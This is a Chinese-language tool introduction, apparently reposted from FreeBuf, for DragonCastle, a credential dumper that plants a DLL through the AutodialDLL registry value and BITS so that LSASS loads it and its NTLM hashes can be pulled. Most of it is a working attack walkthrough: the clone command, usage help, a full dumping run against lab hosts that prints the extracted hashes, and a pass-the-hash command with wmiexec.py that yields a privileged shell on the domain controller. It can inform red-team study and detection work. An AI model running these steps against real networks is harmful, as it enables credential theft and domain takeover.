如何使用DragonCastle从LSASS进程中提取NTLM哈希

 关于DragonCastle 

DragonCastle是一款结合了AutodialDLL横向渗透技术和SSP的安全工具，该工具旨在帮助广大研究人员从LSASS进程中提取NTLM哈希。

该工具会向目标设备中上传一个DLL，然后它会启用远程注册表功能以修改AutodialDLL条目并启动/重启BITS服务。Svchosts将负责加载我们上传的DLL，再次将AutodialDLL设置为默认值，并执行RPC请求以强制LSASS加载与安全支持提供程序相同的DLL。一旦LSASS加载了DLL，它就会在进程内存中进行搜索，以提取NTLM哈希和密钥/IV。

 支持的操作系统版本 

操作系统版本	支持状态
Windows 10 version 21H2
Windows 10 version 21H1	支持
Windows 10 version 20H2	支持
Windows 10 version 20H1 (2004)	支持
Windows 10 version 1909	支持
Windows 10 version 1903	支持
Windows 10 version 1809	支持
Windows 10 version 1803	支持
Windows 10 version 1709	支持
Windows 10 version 1703	支持
Windows 10 version 1607	支持
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

 工具下载 

该工具的运行需要使用到Python 3环境，因此我们首先需要在本地设备上安装并配置好Python 3环境。广大研究人员可以使用下列命令将该项目源码克隆至本地：

git clone https://github.com/mdsecactivebreach/DragonCastle.git


（向右滑动，查看更多）



 工具使用帮助 







psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL
 
 
usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]
 
DragonCastle - A credential dumper (@TheXC3LL)
 
optional arguments:
  -h, --help             显示工具帮助信息和退出
  -u USERNAME, --username USERNAME    有效用户名
  -p PASSWORD, --password PASSWORD    有效密码
  -d DOMAIN, --domain DOMAIN    有效域名
  -hashes [LMHASH]:NTHASH      NT/LM 哈希
  -no-pass              不询问密码
  -k                    使用Kerberos身份验证
  -dc-ip ip address     域控制器的IP地址
  -target-ip ip address   目标设备的IP地址
  -local-dll dll to plant    待上传的DLL本地文件路径
  -remote-dll dll location   更新AutodialDLL 注册表项值的远程路径

（向右滑动，查看更多）


 工具使用样例 


Windows服务器地址为192.168.56.20，域控制器地址为192.168.56.10：

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL
 
 
[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:
 
============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
 
============
[+] Deleting DLL
 
[^] Have a nice day!


（向右滑动，查看更多）





psyconauta@insulanova:~/Research/dragoncastle|⇒  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
 
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:>whoami
sevenkingdomseddard.stark
 
C:>whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
 
C:>

（向右滑动，查看更多）



 项目地址 


DragonCastle：https://github.com/mdsecactivebreach/DragonCastle


参考资料
https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/
https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
https://adepts.of0x.cc/physical-graffiti-lsass/
https://blog.xpnsec.com/exploring-mimikatz-part-2/
https://twitter.com/TheXC3LL








精彩推荐











































原文始发于微信公众号（FreeBuf）：如何使用DragonCastle从LSASS进程中提取NTLM哈希